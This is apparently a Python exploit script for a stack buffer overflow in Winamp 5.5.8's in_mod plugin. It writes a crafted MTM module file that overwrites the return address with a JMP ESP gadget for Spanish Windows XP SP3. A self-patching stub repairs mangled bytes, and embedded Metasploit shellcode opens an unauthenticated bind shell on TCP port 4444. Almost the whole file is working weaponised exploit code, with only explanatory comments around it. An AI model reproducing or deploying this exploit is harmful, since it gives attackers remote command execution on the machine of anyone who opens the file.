#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
# MTM module header, carried over from the fdisk PoC.  The bytes spell out the
# "MTM" magic plus a 0x10 version byte, then the 20-byte song name
# "SpaceTrack(kosmosis)", ten more fixed header bytes and 32 bytes of repeated
# 04 0C pairs.  Field meanings beyond the magic/name are not verified here --
# the values are whatever the crashing sample used.
header = "".join([
    "MTM\x10",                                    # magic "MTM" + version 0x10
    "SpaceTrack(kosmosis)",                       # 20-byte song-name field
    "\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E",   # remaining fixed header bytes (unchanged from PoC)
    "\x04\x0C" * 16,                              # 32 bytes of 04 0C pairs
])

# Filler between the header and the overwritten return address; 58207 NOPs is
# presumably the distance to the saved EIP on the author's build (untested here).
nopsled = "\x90" * 58207

# Overwritten return address, little-endian 0x7C951EED: a JMP ESP gadget on
# Spanish Windows XP SP3.  This is OS-build and language specific (no ASLR on
# XP, so it is static there) and must be re-found for any other target.
eip = "\xED\x1E\x95\x7C"
# Self-patching stub that runs before the bind shell below.  The encoded
# shellcode still contained bytes the target mangles ("badchars"), so those
# positions hold placeholder bytes in `shellcode` and this stub repairs them in
# place at run time.  Encodings used (standard x86, verified against the bytes):
#   33 DB        XOR EBX,EBX
#   54 5B        PUSH ESP ; POP EBX      (EBX = ESP, a position-independent base)
#   81 EB imm32  SUB EBX,imm32           (imm32 = 0xFFFFFC95, i.e. EBX += 0x36B;
#                                         presumably written as a SUB of a
#                                         negative constant to avoid NUL bytes)
#   43           INC EBX                 (walk one byte forward)
#   80 2B ib     SUB BYTE PTR [EBX],ib   (restore the original byte)
# The "Set it to XX - verified" values are the original author's; several of
# them are only arithmetically consistent if the placeholder seen in memory is
# 0x0A (e.g. 0x0A-0x49=0xC1, 0x0A-0xCD=0x3D) or the pair 0x0D 0x0A
# (e.g. 0x0D-0x21=0xEC then 0x0A-0x7C=0x8E), while the file holds 0x0D or
# nothing at those spots -- i.e. some CR/LF line-ending translation happens
# between this script and the loaded module.  That is the "damage from CrLf"
# the 0x90 runs below are slack for.  The exact transformation cannot be
# derived from this file, so re-verify every offset in a debugger before
# changing either the stub or the shellcode; where EBX initially lands also
# depends on where ESP points after the JMP ESP.
patch_shellcode = "\x90" * 16  # NOP slide into the stub
patch_shellcode += "\x90\x33\xDB" # NOP ; XOR EBX,EBX -- set EBX to zero
patch_shellcode += "\x54\x5B" # PUSH ESP ; POP EBX -- get the relative (stack) position
patch_shellcode += "\x81\xEB\x95\xFC\xFF\xFF" # SUB EBX,0xFFFFFC95 (== EBX += 0x36B): make EBX point at our shell
patch_shellcode += "\x43"*13 # INC EBX x13: move EBX as close as we can to the first badchar
patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the first badchar
patch_shellcode += "\x80\x2B\x20" # SUB BYTE PTR [EBX],0x20 -- author: set it to 13 - verified
patch_shellcode += "\x43"*3 # INC EBX x3: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 05 - verified
patch_shellcode += "\x43"*16 # INC EBX x16: move EBX to the next badchar
patch_shellcode += "\x80\x2B\xEC" # SUB [EBX],0xEC -- author: set it to 21 - verified (0x0D placeholder)
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x7C" # SUB [EBX],0x7C -- author: set it to 8e - verified (0x0A placeholder)
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*30 # INC EBX x30: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 05 - verified
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*11 # INC EBX x11: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x42" # SUB [EBX],0x42 -- author: set it to CB - verified (0x0D placeholder)
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x78" # SUB [EBX],0x78 -- author: set it to 92 - verified (0x0A placeholder)
patch_shellcode += "\x90"*26 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*18 # INC EBX x18: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 04 - verified
patch_shellcode += "\x90"*16 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*15 # INC EBX x15: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 02 - verified
patch_shellcode += "\x43"*8 # INC EBX x8: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x21" # SUB [EBX],0x21 -- author: set it to EC - verified (0x0D placeholder)
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x7C" # SUB [EBX],0x7C -- author: set it to 8e - verified (0x0A placeholder)
patch_shellcode += "\x90"*14 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*18 # INC EBX x18: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x49" # SUB [EBX],0x49 -- author: set it to c1 - verified (0x0A placeholder)
patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # INC EBX x4: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: gives EA, but we need F6
patch_shellcode += "\x80\x2B\xF4" # SUB [EBX],0xF4 -- second pass on the same byte: author: set it to F6 - verified
patch_shellcode += "\x43"*9 # INC EBX x9: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 11 - verified
patch_shellcode += "\x43"*10 # INC EBX x10: move EBX to the next badchar
patch_shellcode += "\x90"*3 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x80\x2B\xCD" # SUB [EBX],0xCD -- author: set it to 3D - verified (0x0A placeholder)
patch_shellcode += "\x43"*3 # INC EBX x3: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 07 - verified
patch_shellcode += "\x43"*11 # INC EBX x11: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 12 - verified
patch_shellcode += "\x43"*4 # INC EBX x4: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 12 - verified
patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # INC EBX x4: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 12 - verified
patch_shellcode += "\x43"*8 # INC EBX x8: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 12 - verified
patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*11 # INC EBX x11: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x8E" # SUB [EBX],0x8E -- author: set it to 7F - verified (0x0D placeholder)
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the next badchar
patch_shellcode += "\x80\x2B\xDF" # SUB [EBX],0xDF -- author: set it to 2B - verified (0x0A placeholder)
patch_shellcode += "\x43"*8 # INC EBX x8: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x1E" # SUB [EBX],0x1E -- author: set it to EC - verified (0x0A placeholder)
patch_shellcode += "\x90"*11 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*12 # INC EBX x12: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 08 - verified
patch_shellcode += "\x90"*28 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*29 # INC EBX x29: move EBX to the next badchar
patch_shellcode += "\x80\x2B\xa7" # SUB [EBX],0xA7 -- author: set it to 66 - verified (0x0D placeholder)
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the next badchar
patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x80\x2B\xb8" # SUB [EBX],0xB8 -- author: set it to 52 - verified (0x0A placeholder)
patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*17 # INC EBX x17: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 03 - verified
patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*3 # INC EBX x3: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 12 - verified
patch_shellcode += "\x90"*12 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*2 # INC EBX x2: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 03 - verified
patch_shellcode += "\x43"*7 # INC EBX x7: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 02 - verified
patch_shellcode += "\x90"*10 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*6 # INC EBX x6: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 13 - verified
patch_shellcode += "\x43"*3 # INC EBX x3: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 05 - verified
patch_shellcode += "\x43"*3 # INC EBX x3: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x1B" # SUB [EBX],0x1B -- author: set it to F2 - verified (0x0D placeholder)
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the next badchar
patch_shellcode += "\x80\x2B\xF4" # SUB [EBX],0xF4 -- author: set it to 16 - verified (0x0A placeholder)
patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # INC EBX x4: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 10 - verified
patch_shellcode += "\x43"*4 # INC EBX x4: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 10 - verified
patch_shellcode += "\x90"*20 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*17 # INC EBX x17: move EBX to the next badchar
patch_shellcode += "\x90"*28 # Lazy nopsled (author's words; no patch follows it)
patch_shellcode += "\x43"*16 # INC EBX x16: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x26" # SUB [EBX],0x26 -- author: set it to E7 - verified (0x0D placeholder)
patch_shellcode += "\x90"*18 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*1 # INC EBX: move EBX to the next badchar
patch_shellcode += "\x80\x2B\xBE" # SUB [EBX],0xBE -- author: set it to 4C - verified (0x0A placeholder)
patch_shellcode += "\x43"*7 # INC EBX x7: move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # SUB [EBX],0x20 -- author: set it to 05 - verified
patch_shellcode += "\x90"*(66) # NOP slide from the end of the stub into the (now repaired) shellcode
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
#
# Metasploit win32_bind payload: an *unauthenticated* bind shell.  Once it runs
# inside Winamp, anyone who can reach TCP/4444 on the victim gets a shell with
# Winamp's privileges -- detonate only on an isolated lab host, never on a
# network you do not control.
#
# Badchar handling: each line marked "Should be XX" holds a placeholder byte in
# place of the encoder's original byte XX, which the target mangles; the patch
# stub in `patch_shellcode` restores it at run time with SUB BYTE PTR [EBX],imm8
# (e.g. 0x33 - 0x20 = 0x13).  Lines marked "Ripped" note bytes that were taken
# out of the buffer entirely, which is why this buffer is shorter than the
# 344 bytes the encoder emitted; the author's SUB immediates for those spots
# are consistent with a 0x0D / 0x0D 0x0A placeholder appearing there in memory
# (presumably from CR/LF translation by whatever reads the file -- not
# derivable from this script).  The stub's INC counts are tuned to exactly this
# byte layout: do not re-encode, insert or delete bytes here without
# re-deriving every offset in the stub.
shellcode = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x33" # placeholder -- should be 13
shellcode += "\xa9\x41"
shellcode += "\x25" # placeholder -- should be 05
shellcode += "\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0"
shellcode += "\x56" # \x21\x8e Ripped
shellcode += "\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4"
shellcode += "\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6"
shellcode += "\x25" # placeholder -- should be 05
shellcode += "\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee" # \xcb\x92 Ripped
shellcode += "\x15\x21\x17"
shellcode += "\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d"
shellcode += "\x24" # placeholder -- should be 04
shellcode += "\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22"
shellcode += "\x22" # placeholder -- should be 02
shellcode += "\x35\xb4\xe9\x4d\x8e\x4f\xb5" # \xec\x8e Ripped
shellcode += "\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f"
shellcode += "\x56\x97\x63\x6c\xcf\x29\x36\x0d" # trailing 0x0d stands in for the Ripped \xc1
shellcode += "\x36\x76\x0d" # trailing 0x0d stands in for the Ripped \xf6
shellcode += "\x15\xfa\xef"
shellcode += "\xc1\x8a\xe8\xc3\x92"
shellcode += "\x31" # placeholder -- should be 11
shellcode += "\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d" # trailing 0x0d stands in for the Ripped \x3d
shellcode += "\xfc\x2b"
shellcode += "\x27" # placeholder -- should be 07
shellcode += "\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f"
shellcode += "\x32" # placeholder -- should be 12
shellcode += "\x56\x6c\xfa"
shellcode += "\x32" # placeholder -- should be 12
shellcode += "\x46\x6c\xea"
shellcode += "\x32" # placeholder -- should be 12
shellcode += "\xfa\xef\xcf\x29\x14\x63\xcf"
shellcode += "\x32" # placeholder -- should be 12
shellcode += "\x8c\xde"
shellcode += "\x3c\x29\xa1\x25\xd9\x86\x52\xC0" # \x7f\x2b Ripped
shellcode += "\x15\x6e\xfc\xbe\xd5\x57"
shellcode += "\x0d" # placeholder for the Ripped \xec
shellcode += "\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c"
shellcode += "\x28" # placeholder -- should be 08
shellcode += "\x83\x76"
shellcode += "\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68"
shellcode += "\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29" # \x66\x52 Ripped
shellcode += "\x20\xa4\x6f\x6f"
shellcode += "\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc"
shellcode += "\x23" # placeholder -- should be 03
shellcode += "\xbf\x47"
shellcode += "\x32" # placeholder -- should be 12
shellcode += "\x57"
shellcode += "\x23" # placeholder -- should be 03
shellcode += "\x29\xac\x24\x3b\x3d\x94"
shellcode += "\x22" # placeholder -- should be 02
shellcode += "\xea\x6d\x4d\x57\xf2"
shellcode += "\x33" # placeholder -- should be 13
shellcode += "\xc0\xdc"
shellcode += "\x25" # placeholder -- should be 05
shellcode += "\xfa\xe9" # \xf2\x16 Ripped
shellcode += "\x57\x6e\xf8"
shellcode += "\x30" # placeholder -- should be 10
shellcode += "\x6f\x3e\xf8"
shellcode += "\x30" # placeholder -- should be 10
shellcode += "\x50\x6e"
shellcode += "\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef"
shellcode += "\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5"
shellcode += "\x57\xd7\x99" # \xe7\x4c Ripped
shellcode += "\xfa\xbe\xd3\xc0\x79\x41"
shellcode += "\x25" # placeholder -- should be 05
shellcode += "\x3f"
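# Assemble the malicious module: MTM header, filler up to the saved return
# address, the JMP ESP address, the self-patching stub, then the bind shell.
payload = header + nopsled + eip + patch_shellcode + shellcode

# Write in *binary* mode.  The original opened the file with "w": on Windows
# that translates every 0x0A in the output to 0x0D 0x0A and shifts every byte
# after it, which would silently desynchronise the hand-tuned offsets in
# patch_shellcode.  The current payload contains no 0x0A byte, so "wb" yields
# the same file here; it just stops a future shellcode/encoder change from
# being corrupted on the way to disk.  Only file errors are caught, and the
# reason is printed instead of being swallowed by a bare `except:`.
try:
    with open("crash.mtm", "wb") as out:
        out.write(payload)
except (IOError, OSError) as err:
    print("Cannot create file: %s" % err)
else:
    print("MTM file generated successfuly")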